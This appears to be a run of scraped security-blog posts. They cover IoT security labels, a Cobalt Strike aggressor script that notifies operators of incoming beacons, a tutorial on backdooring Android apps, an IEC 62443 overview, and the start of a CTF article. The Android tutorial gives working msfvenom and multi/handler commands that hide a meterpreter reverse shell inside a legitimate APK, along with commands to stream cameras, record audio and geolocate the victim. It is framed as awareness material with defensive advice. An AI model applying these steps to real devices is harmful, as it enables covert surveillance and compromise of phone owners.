On top of the baseline, some consumers may be looking for additional safeguards and guarantees that the device they are buying is up to snuff. Especially when purchasing devices that handle more sensitive types of data, such as smart home assistants, cameras, or locks, security plays a larger role for many buyers. In this case, a voluntary quality label could form a good indicator for consumers that the manufacturer went the extra mile, and it would prove a good point to compete on for the manufacturers themselves to distinguish their product from the competitor’s offerings. Just like the certification of the baseline requirements for devices, an IoT quality label is also proposed in the aforementioned EUCC cybersecurity scheme candidate. Quality labels can be used to either reflect that a device adheres to a certain standard of cyber security or privacy, or that they have implemented additional measures beyond the baseline that are not necessarily found in other devices of the same category. In the case of the EUCC, the label will show a consumer that it is certified against that particular certification scheme, as well as list a CSA assurance level (Basic, Substantial, or High) to reflect the degree of how advanced the security measures of the device are.

Proposed Label by the EUCC
(Image source: EUCC Candidate Scheme, ENISA)

The EUCC is not the first certification scheme that mentions a quality label. In the context of industrial control systems, the IEC 62443-4-1 and 62443-4-2 standards – which formulate guidelines for the production lifecycle and technical guidelines for the security of products – also provide a certification scheme and label, but adoption within the industry has been very slow.

While a widely adopted quality label is not available yet, in the meantime manufacturers can still distinguish themselves by being transparent about the security of their products: how about a page on the website that outlines the efforts spent on security?

Conclusion

To guide the smart home industry towards a better, more solid security baseline and stronger privacy guarantees, binding regulations for all devices sold within the EU can pave the way. These regulations should be based on the mandated use of secure building blocks and easy to verify guidelines. The recent cybersecurity act gives ENISA a new mandate to create exactly such certification schemes, a first of which they have released in July 2020 in the form of the EUCC.

Additionally, a voluntary IoT quality label can be a strong indicator for consumers who want more than just a baseline of security measures and a competition point for manufacturers who want to prove they went the extra mile.

This research was conducted as part of the author’s thesis dissertation submitted to gain his Master of Science: Computer Science Engineering at KU Leuven and device purchases were funded by NVISO labs. The full paper is available on KU Leuven libraries.

Reference

[1] Bellemans Jonah. June 2020. The state of the market: A comparative study of IoT device security implementations. KU Leuven, Faculteit Ingenieurswetenschappen.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their Cyber Security Strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Tap tap… is this thing on? Creating a notification-service for Cobalt-Strike

5 March 2021 at 15:07

Ever needed a notifier when a new beacon checks in? Don’t want to keep checking your Cobalt-Strike server every 5 minutes in the hopes of a new callback? We got you covered! Introducing the notification-service aggressor script available at
https://github.com/NVISOsecurity/blogposts/tree/master/cobalt-strike-notifier

If the above image resonates with you, you’ll know that the point between sending out your phish and receiving your first callback is a very stressful time. All kinds of doom scenarios pop into your head… “Did I test my payload sufficiently?”, “Did my email get blocked somewhere along the chain?”, “Did my target pay attention and reported it as a phish?” You can solve some of these issues by introducing “canaries” in your payloads, for example, an image that phones home when the email is opened, an arbitrary HTTP (or DNS) request to a server you control.

There is however one thing you cannot control, even if you really wanted to: WHEN a user will click on your payload. If you are using Cobalt-Strike out of the box, this will result in you having to check your GUI every x minutes/hours/days to see if a beacon dialed in or not, and by the time you see your beacon connecting, it might already be several minutes or even hours that your beacon is active, this is of course less than ideal.

Thankfully Cobalt-Strike allows us to modify or expand its default behavior through the usage of “Aggressor Scripts”. These scripts are developed in “sleep”. Sleep is a java based scripting language developed and invented by Raphael Mudge (the creator of Cobalt-Strike). There are already a ton of aggressor scripts out there and there even was one that closely resembled our use case developed by FortyNorthSecurity:
https://fortynorthsecurity.com/blog/aggressor-get-text-messages-for-your-incoming-beacons/

Albeit close to what we wanted to implement, it was not ticking all boxes for us. The aforementioned aggressor relied on older python code and was using an email-to-text service only available in the US. This aggressor also didn’t provide an “opt-out” which means you’ll have to kill the aggressor on the team server if you wanted to quit having notifications. So we decided to put on our coding hats and started exploring the world of aggressor coding ourselves.

Tackling two problems for the price of one.

Aggressor scripts are profile specific. This means that they get loaded up when you establish your user session and unloaded when you disconnect from the team server.
This is not a problem for normal operations, but for a notification server this might not be what we want. Luckily Raffi (that’s how Raphael Mudge often refers to himself) thought of this and introduced a binary packaged with Cobalt-Strike called “agscript”. This allows to run Cobalt-Strike in headless mode.

Both approaches have their advantages and disadvantages however:

  • Headless mode will need you to hardcode all your values in your aggressor script or figure out a way to parse them from your GUI event log window.
    This is a bit cumbersome and reduces flexibility in case you want to turn notifications on or off, (assuming you don’t want to get signal/text/mail spammed every time you lateral move).
  • “Graphical” mode (for the lack of a better term) will unload if you disconnect from your Cobalt-Strike session. You’ll therefore not receive any notifications if beacons check in while you are disconnected.

We decided we wanted full flexibility so we created both a headless and a graphical aggressor.

Meet our notification GUI

Let’s take a look at our graphical aggressor script first:

As you can see here the power of a graphic aggressor really shines, as you can toggle your notifications on and off and fine grain them however you’d like. Let’s take a look under the hood on how this actually works I’ll explain as we go.. 🙂

First of all we define global variables, these can then be used from any function we want.
Then we set debug level to 57, for more information about debug levels check the Sleep manual.

global ('$emailaddress');
global ('$email2textaddress');
global ('$signalphonenumber');
global ('$receivesignalmessages');
global ('$receivemails');
global ('$receivetexts');
global ('$scriptlocation');

debug(57);

Then we define a callback function. This callback function is called when the set preferences button is clicked and basically takes care of parsing the GUI and setting all global variables to their respective values. This also makes sure they persist when you close and reopen the window. The callback function also takes care of error handling in the GUI. For example if you set signal messaging to on but you are not providing a signal number.

sub callback {
	$receivemails = $3["emailchkbox"];
	$emailaddress = $3["email"];
	$email2textaddress = $3["txt2email"];
	$receivetexts = $3["textschkbox"];
	$signalphonenumber = $3["signalnumber"];
	$receivesignalmessages = $3["signalchkbox"];
	$scriptlocation = $3["script_location"];
	if(($receivemails eq 'true') && (strlen($emailaddress) == 0))
	{
		show_message("You won't receive emails because you did not input an email address!");
	}	
	else if(($receivetexts eq 'true') && (strlen($email2textaddress) == 0))
	{
		show_message("mail to text field is empty, you will not receive text messages");
	}
	
	else if (($receivesignalmessages eq 'true') && (strlen($signalphonenumber) == 0))
	{
		show_message("You won't receive signal messages because you did not input a phone number");
	}
	
	else
	{
		show_message("preferences saved successfully!");
	}
	
	if (checkError($error)) 
	{
		warn("$error");
	}	

}



The shownotificationdialog function is responsible of drawing our GUI and setting up some default values:

sub shownotificationdialog{
	$dialog = dialog("notification preferences",%(email => $emailaddress, txt2email => $txt2email,signalnumber => $signalphonenumber,script_location => "/home/kali/aggressors/mailer.py", emailchkbox => $receivemails,textschkbox => $receivetexts, signalchkbox => $receivesignalmessages),&callback);
	dialog_description($dialog, "Get notified when a new beacon calls home.");
	drow_text($dialog,"email","Your email address:");
	drow_text($dialog,"txt2email","Email address of the mail-to-text provider:");
	drow_text($dialog,"signalnumber","Your signal phone number in internation notation(+countrycode):");
	drow_text($dialog,"script_location","The location of the mail script on YOUR LOCAL HOST:");
	drow_checkbox($dialog,"emailchkbox","Do you want email notifications?");
	drow_checkbox($dialog,"textschkbox","Do you want text messages?");
	drow_checkbox($dialog,"signalchkbox","Do you want signal messages?");
	dbutton_action($dialog,"set preferences");
	dialog_show($dialog);
}

The popup aggressor hooks onto the Cobalt-Strike menu button in the Cobalt-Strike GUI. A list of hooks can be found here. Basically this function triggers the shownotificationdialog function whenever the button is pressed:

popup aggressor {
item "Notification preferences" {shownotificationdialog();}
}

The real “magic” however is in the on beacon_initial callback, this method will parse the hostname and the internal ip address from the beacon and will invoke the python script using Sleeps built-in exec function.

on beacon_initial {
local('$computer');
local('$internal');
$computer = beacon_info($1, "computer");
$internal = beacon_info($1, "internal");
if(($receivemails eq 'true') && (strlen($emailaddress) != 0)){
		 println("executing python $scriptlocation --ip $internal --computer $computer --receive-emails $emailaddress");
		 $handle = exec("python $scriptlocation --ip $internal --computer $computer --receive-emails --email-address $emailaddress");
	}
	
if(($receivetexts eq 'true') && (strlen($email2textaddress) != 0))
{
		println("executing python $scriptlocation --ip $internal --computer $computer --receive-texts --mail_totext $email2textaddress ");
		$handle = exec("python $scriptlocation --ip $internal --computer $computer --receive-texts --mail_totext $email2textaddress");
}
	
if (($receivesignalmessages eq 'true') && (strlen($signalphonenumber) != 0))
{
	println("executing python $scriptlocation --ip $internal --computer $computer --receive-signalmessage --signal-number $signalphonenumber");
	 $handle = exec("python $scriptlocation --ip $internal --computer $computer --receive-signalmessage --signal-number $signalphonenumber");
}
	

if (checkError($error)) 
	{
		warn("$error");
	}	

};

An important gotcha! As I already mentioned, your aggressor script is bound to your profile, it is not bound to the team server. As a result, “exec” will execute the command on YOUR machine, NOT THE TEAMSERVER. The notifier script has some dependencies the primary one is obviously python3 as it’s a python script. For signal integrating, it’s relying on signal-cli.

Distracted Boyfriend Meme - Imgflip

Meet our Notification User!

Our headless-mailer aggressor script shares a lot of similarities to our graphic aggressor script:

global ('$emailaddress');
global ('$email2textaddress');
global ('$signalphonenumber');
global ('$scriptlocation');
global ('$receivemails');
global ('$receivetexts');
global ('$receivesignalmessages');


$emailaddress = "";
$txt2emailaddress ="";
$signalphonenumber ="+countrycode";
$scriptlocation = "/some/dir/notifier.py";
$receivemails = "true";
$receivetexts = "false";
$receivesignalmessages = "true";


on beacon_initial {
local('$computer');
local('$internal');
$computer = beacon_info($1, "computer");
$internal = beacon_info($1, "internal");
if(($receivemails eq 'true') && (strlen($emailaddress) != 0)){
		 say("new beacon detected! Emailing $emailaddress");
		 println("executing python $scriptlocation --ip $internal --computer $computer --receive-emails $emailaddress");
		 $handle = exec("python $scriptlocation --ip $internal --computer $computer --receive-emails --email-address $emailaddress");
	}
	
if(($receivetexts eq 'true') && (strlen($email2textaddress) != 0))
{
		say("new beacon detected! sending an email to the email to text service!");
		println("executing python $scriptlocation --ip $internal --computer $computer --receive-texts --mail_totext $email2textaddress ");
		$handle = exec("python $scriptlocation --ip $internal --computer $computer --receive-texts --mail_totext $email2textaddress");
}
	
if (($receivesignalmessages eq 'true') && (strlen($signalphonenumber) != 0))
{
	say("new beacon detected! sending a signal message to $signalphonenumber");
	println("executing python $scriptlocation --ip $internal --computer $computer --receive-signalmessage --signal-number $signalphonenumber");
	 $handle = exec("python $scriptlocation --ip $internal --computer $computer --receive-signalmessage --signal-number $signalphonenumber");
}
}

As already mentioned, headless means that you’ll need to hardcode your variables instead of having the options in the GUI. Once you filled in the variables, you can launch the agscript for a headless connection to your Cobalt-Strike server:

./agscript 127.0.0.1 50050 notification-service demo  /home/jean/Documents/Tools/Agressors/headless-notifier.cna     

This can be run from anywhere you want, but your session needs to remain open so I recommend running it directly from your teamserver. The syntax is agscript <host> <port> <username> <password> </path/to/cna>. When done successfully a new user will have entered your server:

Now your notification service is ready for action! When a new beacon spawned the notification service will announce it in the event log window + will take the appropriate action.

Now check your email and/or phone, a new message will be waiting for you!

The real magic lies in the python script!?

Not really though, the python script is fairly trivial:

import argparse
import os
import smtplib
from email.mime.multipart import MIMEMultipart 
from email.mime.text import MIMEText  

#change your smtp login details here.
fromaddr = ""
smtp_password=""
smtp_server =""
smtp_port = 587

#change your signal REGISTRATION number here:
signal_registration_number =""

#leave these blank,will be dynamically filled through the aggressor.
smsaddr = ""
mailaddr = ""


parser = argparse.ArgumentParser(description='beacon info')
parser.add_argument('--computer')
parser.add_argument('--ip')
parser.add_argument('--receive-texts', action="store_true")
parser.add_argument('--receive-emails', action="store_true")
parser.add_argument('--receive-signalmessage', action="store_true")
parser.add_argument('--email-address')
parser.add_argument('--mail_totext')
parser.add_argument('--signal-number')

args = parser.parse_args()
toaddr = []

#take care off email and email2text:
if args.receive_texts and args.mail_totext:
    toaddr.append(smsaddr)
if args.receive_emails and args.email_address:
    toaddr.append(args.email_address)


#message contents:
hostname = args.computer
internal_ip = args.ip
body = "Check your teamserver! \nHostname - " + str(hostname) + "\nInternal IP - " + str(internal_ip)

#email logic
if toaddr:
	print("debug")
	msg = MIMEMultipart()
	msg['From'] = fromaddr
	msg['To'] = ", ".join(toaddr)
	msg['Subject'] = "INCOMING BEACON"
	msg.attach(MIMEText(body, 'plain'))
	server = smtplib.SMTP(smtp_server, smtp_port)
	server.starttls()
	server.login(fromaddr,smtp_password)
	text = msg.as_string()
	server.sendmail(fromaddr, toaddr, text)
	server.quit()

#signal-cli
if args.signal_number and args.receive_signalmessage:
	#take care of signal
	print(f"{args.signal_number}")
	os.system(f"signal-cli -u {signal_registration_number} send -m " + "\"" + str(body) + "\"" +  f" {args.signal_number}")

As you can see it’s nothing more than a simple email script with 1 OS command executor for the signal-cli.

This means that, whether you are execution graphical or headless you’ll need to have python3 installed (and available as your default “python”) and signal-cli installed as well in your global path.

If signal-cli is not in your global path you can adapt the python script to take this into account, it only requires a small change. The same would go for python3 not being your default “python” command.

Conclusions

We hope this “deep” dive into the world of Cobalt-Strike aggressors will open the gates for even more awesome aggressor scripts being developed!
Enjoy your beacon notification services, and good luck, have fun in your next engagements!

The code corresponding to this blog post can be found here:

https://github.com/NVISOsecurity/blogposts/tree/master/cobalt-strike-notifier

About the author

Jean-François Maes is a red teaming and social engineering expert working in the NVISO Cyber Resilience team. 
When he is not working, you can probably find Jean-François in the Gym or conducting research.
Apart from his work with NVISO, he is also the creator of redteamer.tips, a website dedicated to help red teamers.
Jean-François is currently also in the process of becoming a SANS instructor for the SANS SEC699: Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection course
He was also ranked #1 on the Belgian leaderboard of Hack The Box (a popular penetration testing platform).
You can find Jean-François on LinkedIn , Twitter , GitHub and on Hack The Box.

Backdooring Android Apps for Dummies

31 August 2020 at 07:57

TL;DR – In this post, we’ll explore some mobile malware: how to create them, what they can do, and how to avoid them. Are you interested in learning more about how to protect your phone from shady figures? Then this blog post is for you.

Introduction

We all know the classic ideas about security on the desktop: install an antivirus, don’t click suspicious links, don’t go to shady websites. Those that take it even further might place a sticker over the webcam of their laptop, because that is the responsible thing to do, right?

But why do most people not apply this logic when it comes to their smartphones? If you think about it, a mobile phone is the ideal target for hackers to gain access to. After all, they often come with not one, but two cameras, a microphone, a GPS antenna, speakers, and they contain a boatload of useful information about us, our friends and the messages we send them. Oh, and of course we take our phone with us, everywhere we go.

In other words, gaining remote access to someone’s mobile device enables an attacker to do all kinds of unsavoury things. In this blog post I’ll explore just how easy it can be to generate a rudimentary Android remote administration trojan (or RAT, for short).

  • Do you simply want to know how to avoid these types of attacks? Then I suggest you skip ahead to the section “How to protect yourself” further down the blog post.
  • Do you want to learn the ins and outs of mobile malware making? Then the following section will guide you through the basics, step by step.

It’s important to know this metasploit RAT is a very well-known malware strain that is immediately detected by practically any AV solution. This tutorial speaks of a rudimentary RAT because it lacks a lot of functionality you would find in actual malware in the wild, such as obfuscation to remain undetected, or persistence to gain access to the device even when the app is closed. Because we are simply researching the possibilities of these types of malware and are not looking to attack a real target, this method will do just fine for this tutorial.

Cooking yourself some mobile malware; a recipe

Ingredients

  • A recent Kali VM with the latest Metasploit Framework installed
  • A spare Android device
  • [Optional] A copy of a legitimate Android app (.apk)

Instructions

Step 1 – Find out your IP address

To generate the payload, we will need to find out some more information about our own system. The first piece of information we’ll get is our system’s IP address. For the purpose of this blog post we’ll use our local IP address but in the real world you’d likely use your external IP address in order to allow infected devices to connect back to you.

Our IP address can simply be found by opening a terminal window, and typing the following command:

ip a

The address I will use is the one from the eth0 network adapter, more specifically the local IPv4 address as circled in the screenshot.

Step 2 – Generate the payload

This is where the real work happens: we’ll generate our payload using msfvenom, a payload generator included in the Metasploit Framework.

Before you start, make sure you have the following ready:

  1. Your IP address as found in the previous step
  2. Any unused port to run the exploit handler on
  3. (Optional) A legitimate app to hide the backdoor in

We have two options: either we generate the payload standalone, or we hide it as part of an existing legitimate app. While the former is easier, we will go a step further and use an old version of a well-known travel application to disguise our malware.

To do this, open a new terminal window and navigate to the folder containing the legitimate copy of the app you want to backdoor, then run the following command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<your_ip_address> LPORT=<your unused port> -x <legitimate app> -k -o <output name>

For this blog post, I used the following values:

  • <your ip address> = 192.168.43.6
  • <your unused port> = 4444
  • <legitimate app> = tripadvisor.apk
  • <output name> = ta-rat.apk

Step 3 – Test the malware

Having our payload is all fine and dandy, but in order to send commands to it, we need to start a listener on our kali VM on the same port we used to create our malware. To do this, run the following commands:

msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost <your ip address>
set lport <your unused port>

run

Now that we have our listener set up and ready to accept connections, all that remains for us to do is run the malware on our spare Android phone.

For the purposes of this blogpost, I simply transferred the .apk file to the device’s internal storage and ran it. As you can see in the screenshot, the backdoored application requires quite a lot more permissions than the original does.

The original app permissions (left) and the malicious app permissions (right)

All that’s left now is to run the malicious app, and …

We’re in!

Step 4: Playing around with the meterpreter session

Congratulations! If you successfully reached this step, it means you have a working meterpreter session opened on your terminal window and you have pwned the Android phone. So, let’s take a look at what we can do now, shall we?

Activating the cameras

We can get a glimpse into who our victim is by activating either the front or the rear camera of the device. To do this, type the following command in your meterpreter shell:

webcam_stream -i <index>

Where <index> is the index of the camera you want to use. In my experience, the rear camera was index 1, while the selfie camera was at index 2.

Recording the microphone

Curious about what’s being said in the victim’s vicinity? Try recording the microphone by typing:

record_mic -d <duration>

Where <duration> is the duration you want to record in seconds. For example, to record 15 seconds of audio with the device’s built-in microphone, run:

record_mic -d 15

Geolocation

We can also find out our victim’s exact location by typing:

geolocate

This command will give us the GPS coordinates of the device, which we can simply look up in Google Maps.

Playing an audio file

To finish up, we can play any .wav audio file we have on our system, by typing:

play <filename>.wav

For example:

play astley.wav

Experimenting with other functionality

Of course, these are just a small set of commands the meterpreter session has to offer. For a full list of functionalities, simply type:

help

Or for more information on a specific command, type:

<command> -h

And play around a bit to see what you can do!

Caveats

During my initial attempts to get this to work, there were a few difficulties that you might also run into. The most difficult part in the process is finding an app to add the backdoor to. Most recent android apps prevent you from easily decompiling and repackaging them by employing various obfuscation techniques that make it much more difficult to insert the malicious code. For this exercise, I went with an old version of a well known travel app that did not (yet) implement these techniques, as trying to backdoor any of the more recent versions proved unsuccessful.

This is further strengthened by the fact that Android’s permissions API is constantly evolving to prevent this type of abuse by malicious apps. Therefore, it’s not possible to get this exploit to work on the newest Android versions that require explicit user approval before granting the app any dangerous permissions at runtime. That said though, if you are an Android phone user reading this post, be aware that new malware variants constantly see the light of the day, and you should always think twice before granting any application a permission on your phone it does not strictly require. Yes, even if you have the latest safety updates on your device. Even though the methods described in this blog post only work for less recent versions of Android, considering that these versions represent the majority of the Android market share, an enormous number of devices remain vulnerable to this exploit to this day.

There exist some third-party tools and scripts on the internet that promise to achieve more reliable results in backdooring even more recent android apps. However, in my personal experience these tools did not always live up to their expectations. Your mileage may vary in trying these out, but in any case, don’t blindly trust the ReadMe of code you find on the internet: check it yourself and make sure you understand what it does before you run it.

How to protect yourself

Simply put, protecting yourself against these types of attacks starts with realising how these threats make their way onto your system. Your phone already takes a lot of security precautions against malicious applications, so its a good start to always make sure your phone is running the latest update. Additionally, you will need to think twice: once when you choose to install the application, and one more time when you choose to grant the application certain permissions.

First, only install apps from the official app store. Seriously. The app stores for both Android and iOS are strictly curated and scanned for viruses. Is it impossible that a malicious app sneaks by their controls? Not entirely, but it is highly unlikely that it will stay in the store for long until it’s noticed and removed. On iOS, you don’t have much of a choice anyway: if you have not jailbroken your device, you are already restricted to the App Store. For Android, there’s a setting that also allows you to install apps from untrusted sources. If you simply want to enjoy the classic experience your smartphone offers you, you won’t need to touch that setting at all: the google play store likely has everything you’d ever want to do. If you are a more advanced user who wants to be able to fully customise their phone and even root it or add custom ROMs: be my guest, but be extra careful when installing anything on your phone, as you lose a large amount of protections the google play store offers you. Experimenting with your phone is fine, but you need to be very aware of the additional risks you are taking. That goes double if you are downloading unofficial apps from third party sources.

Second, not all apps need all the permissions they ask for. A flashlight application does not need access to your microphone to function properly, so why would you grant it that permission? If you are installing an application and the permission list seems suspiciously long, or certain items definitely are not needed for that app to function, maybe reconsider installing it in the first place, and definitely do NOT give it those permissions. In the best case, they are invading your privacy by tracking you for advertising. In the worst case, a criminal might be trying to exploit the permissions to spy on you.

One last tip I’d like to give is to leave the security settings on your device enabled. It doesn’t matter if you have an iPhone or an Android phone: both iOS and Android have some great security options built in. This also means you won’t need third party antivirus apps on your phone. Often, these apps provide little extra functionality as they are much more restricted in what they can do as compared to what the native security features of your mobile phone OS are already doing.

Conclusion

If there is anything I’d like you to remember from reading this blog post, it’s the following two points:

1. Creating Mobile Malware is Easy. Almost too easy.

This blog post went over the steps to take in order to make a rudimentary Android malware, demonstrating how easy it can be to compromise a smartphone. With a limited set of tools, we can generate and hide a meterpreter reverse shell payload into an existing app, repackage it and install it on an Android device. Anyone with enough motivation to do this can learn it in a limited time frame. There is no need for a large amount of technical knowledge in order to learn this.

2. Smartphones are computers, they need to be protected.

It might not look like one, but a smartphone is a computer just like the one sitting on your desk. These devices are equally vulnerable to malware, and even though the creators of these devices already take a lot of precautions, the user is in the end responsible to keep their device safe. Smartphone users should be aware of the risks their devices face and stay away from unofficial applications outside of the app store, enable the security settings on their devices and be careful to grant excessive permissions to apps, especially from untrusted sources.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their cyber security strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Securing IACS based on ISA/IEC 62443 – Part 1: The Big Picture

4 January 2021 at 16:08

For many years, industrial automation and control systems (IACS) relied on the fact that they were usually isolated in physically secured areas, running on proprietary hardware and software. When open technologies, standard operating systems and protocols started pushing their way into IACS replacing proprietary solutions, the former “security through obscurity” approach did no longer work. Connecting operational technology (OT) networks to information technology (IT) networks had the benefit of making central monitoring and improvement of industrial processes easier – but all these changes also brought new threats and the question of how to properly secure control systems did arise.

This is where ISA/IEC 62443 comes into the picture. The attempt to provide guidance on how to secure IACS against cyber threats reaches back to 2002 when the International Society for Automation (ISA) started creating a series of standards referred to as ISA-99. In 2010, ISA joined forces with the International Electrotechnical Commission (IEC) which lead to the release of the combined standard ISA/IEC 62443 that integrates the former ISA-99 documents.

ISO 27001 vs IEC 62443 – same but different?

But why is there the need for a separate standard at all? Does it not suffice to simply apply security measures that have already been established for IT systems, for example by implementing the requirements of ISO 27001? As a company responsible for designing, implementing, or managing IACS, you might face exactly this question, especially if you want to achieve an official certification.

Despite some similarities, OT systems and IT systems do have fundamental differences. One of the most significant differences is probably that failures in industrial processes usually impact the physical world, i.e. they could harm human health and welfare, endanger the environment by spilling hazardous materials or impact the local economy, for example in case of massive power outages. Also, the focus on core security objectives – such as confidentiality, integrity and availability – is different: While IT prioritizes confidentiality of data, OT focuses on availability of systems; the security objectives of both areas are thus diametrically opposed.

IEC 62443 outlines the unique requirements of IACS while also building on top on already established practices. This means that parts of IEC 62443 were developed with reference to ISO 27001 but also address the differences between IACS and IT systems. Also, the standard does not only outline the implementation of a management system but defines detailed functional and process requirements for both individual IACS components and entire control systems. IEC 62443 thus has a far broader range than ISO 27001 and is more tailored to the specifics of IACS.

IEC 62443 at a glance

The IEC 62443 standard is targeted at three main roles:

  • Product suppliers that develop, distribute and maintain components or systems used in automated solutions.
  • System integrators that design, deploy and commission the automated solution.
  • Asset owners that operate, maintain and decommission the automated solution.

These roles could reside in the same organization or be fulfilled by different organizations. Asset owners might, for example, have an own department responsible for system integration. In another scenario, the asset owner might delegate the task to maintain an automation solution to an external service provider.

The structure of the standard reflects this role definition by grouping related documents accordingly. As a result, IEC 62443 comprises four chapters, each with multiple documents. Some of the documents are currently still in development and have not been released yet. The current status can be tracked at: https://www.isa.org/isa99/

Structure of IEC 62443

The first chapter, General, provides an overview of main concepts and models applied within the standard. At the time of this post, most documents of this chapter are still under development.

The second chapter, Policies and Procedures, covers requirements and measures for establishing a Cyber Security Management System. In the first two parts you will see many references to ISO 27001 and even a mapping of the requirements in both standards. The other parts focus on the processes involved in operating and maintaining IACS and are thus mainly directed at asset owners or – if these tasks are outsourced – at service providers.

The third chapter, System, is mainly directed at system integrators. It provides an overview and assessment of different security measures ranging from authentication techniques and encryption to physical security controls. Furthermore, it guides through the risk assessment process for IACS environments and outlines specific technical requirements for control systems.

The last chapter, Component, focuses on requirements for product suppliers. It covers both procedural aspects such as setting up a secure development lifecycle and technical requirements that a component should meet.

One standard for the entire lifecycle

With regard to IACS, we can distinguish between the lifecycle of a single component that is part of a control system and the lifecycle of the control system itself. Both lifecycles overlap at the point where components get integrated into an automation solution and need to be operated and maintained.

Product suppliers are responsible for all phases within their products’ lifecycle. Part 4-1 provides guidance on how to set up development processes that integrate security-related activities right from the start of product development. Part 4-2 focuses on the product itself and defines specific requirements a product must meet in order to achieve a certain degree of security. Another relevant part especially in the maintenance phase is part 2-3 that outlines a structured process for managing patches.

Applicability of IEC 62443 parts within the product and IACS lifecycle

In the first phase of the IACS lifecycle, the main objective is creating the functional specification. Part 2-1 provides the asset owner with a framework for setting up organizational structures and processes that will ensure that all security dimensions are considered when creating the specification and defining security targets for the IACS.

The commissioning of an IACS usually lies within the responsibility of the system integrator. Based on the previously defined security targets, the system integrator must develop a protection concept in cooperation with the asset owner. Part 3-2 outlines requirements for conducting a risk assessment in order to establish a proper segmentation of the system architecture. Part 3-3 defines which requirements a system must meet in order to achieve a certain level of security. By implementing these requirements, system integrators can prove that their solution meets the security targets defined by the asset owner.

The main responsibility for operating and maintaining the automation solution lies with the asset owner. Part 2-1 provides guidelines how to implement a security management system in order to continuously maintain and improve security. More specific requirements, for example on how to manage accounts or remote access on systems, are outlined in part 2-4; this part should also be considered by system integrators and any service provider supporting the asset owner in the operating phase.

Finally, both parts 2-1 and 2-4 also define requirements for decommissioning single components or the complete automation solution.

Defence in depth

IEC 62443 builds upon the defence in depth principle involving all stakeholders. Defence in depth means that multiple layers of security controls are applied: In case one security control fails, another control ensures that this will still not cause any greater harm.

With regard to IACS, this means that the first layer of defence are measures implemented by the asset owner. This can be for example security policies and procedures or physical controls protecting the perimeter. Further layers of defence are then created in the design of the automation solution by the system integrator, for example by enforcing network segmentation and deploying firewalls. The inner defence layer is realized by the functional security capabilities of components and systems in use. They are developed by the product supplier who is responsible for integrating proper security functions.

Security levels

The number of requirements and security functions to implement depends on the level of security that has been specified by the asset owner. IEC 62443 defines four Security Levels (SL) with increasing protection requirements.

IEC 62443 security levels

The standard further defines three different types of security levels:

  • Target Security Level (SL-T) is the desired level of security that is usually determined by performing a risk assessment.
  • Achieved Security Level (SL-A) is the degree of security achieved with the currently implemented measures. It can be determined through an audit, for example, after the design is available or when the system is in place in order to verify that the implementation meets the previously defined requirements.
  • Capability Security Level (SL-C) is the highest possible security level that a component or system can provide without implementing additional measures.

A simple example illustrates how these three types of security levels play together: We want to protect our orchard against kids stealing apples. This objective is our target security level (SL-T) corresponding to Security Level 2. There are different means available that could help us achieve our goal such as putting up a sign or a fence or buying a watchdog. A sign might not be very effective, i.e. it does not really provide any protection, so its capability security level is 0. Fence or watchdog can ensure better protection, meaning they have higher capability security levels. We now decide which means of protection we set up and then measure how well we are protected, i.e. which security level we have achieved with these measures (SL-A).

Translating this example to the IACS lifecycle, this means that the different types of security levels are applied at different phases of the system lifecycle:

  • The asset owner will first specify the target security level required for a particular automation solution.
  • The system integrator will design the solution to meet those targets. In an iterative process the currently achieved security level (SL-A) is measured and compared to the target security level  (SL-T) – also after the solution is put into operation to ensure that the achieved security level does not decrease over time.
  • As part of the design process the system integrator will select systems and components with the necessary capability security level (SL-C).

Getting certified

After having gained a basic understanding of what IEC 62443 comprises, let us come back to the initial question on how you can achieve an official certification. One misconception is that there is just one IEC 62443 certification as is the case for ISO 27001. Given the broad range of the standard and the multiple stakeholders addressed, the question you should pose is not: Should I get an IEC 62443 certification? but rather Which IEC 62443 certification should I get?

As outlined before, from the stakeholders’ perspective, some parts of the standard are more relevant than others. As a result there are different IEC 62443 certifications focusing on different parts of the standard. For example, most certification programs for product suppliers only consider the requirements outlined in parts 4-1 and 4-2 while certifications for system integrators focus on parts 2-4 and 3-3.

As the market for IEC 62443 certification programs is still less mature when compared with ISO 27001 certifications, the number of organizations offering such a certification is also smaller; some of the most prominent players are TÜV, exida, CertX, UL, DEKRA and ISASecure.

Conclusion

IEC 62443 might be confusing at first glance and the sheer number of documents and requirements may seem intimidating. However, most likely just a small part of the standard will be actually applicable to your organization. The upcoming parts of this blog series on IEC 62443 will outline the specific requirements for each stakeholder in more detail. At the end, you will hopefully have a better understanding on how the standard helps you improve the security of your components or systems and which steps you need to take to get closer to an IEC 62443 certification.

If you need further guidance and support in preparing for an IEC 62443 certification, please contact [email protected].

About the author

Claudia Ully is a penetration tester working in the NVISO Software and Security Assessments team.
Apart from spotting vulnerabilities in applications, she enjoys helping and training developers and IT staff to better understand and prevent security issues.
You can find Claudia on LinkedIn.

Cyber Security Contests – A look behind the scenes about how to expand the community

10 December 2020 at 16:12

Cyber security has long since become a strategic priority for organizations across the globe and in all sectors. Therefore, training and hiring young potential in information security has become a crucial goal.  

To raise awareness of cyber security threats and help train a generation of security aware security experts, we at NVISO organize Capture the Flag (CTF) Cyber Security Events in two countries, Belgium and Germany and reach a broad audience.  

Each year, we organize the Cyber Security Challenge Belgium and the Cyber Security Rumble Germany. After six successful editions in Belgium and two in Germany, we want to share a little information on how the events came to be, and what the main challenges are that we face.

This image has an empty alt attribute; its file name is image-7.png

The organization team of this year’s Challenge

The Capture the Flag events at a glance

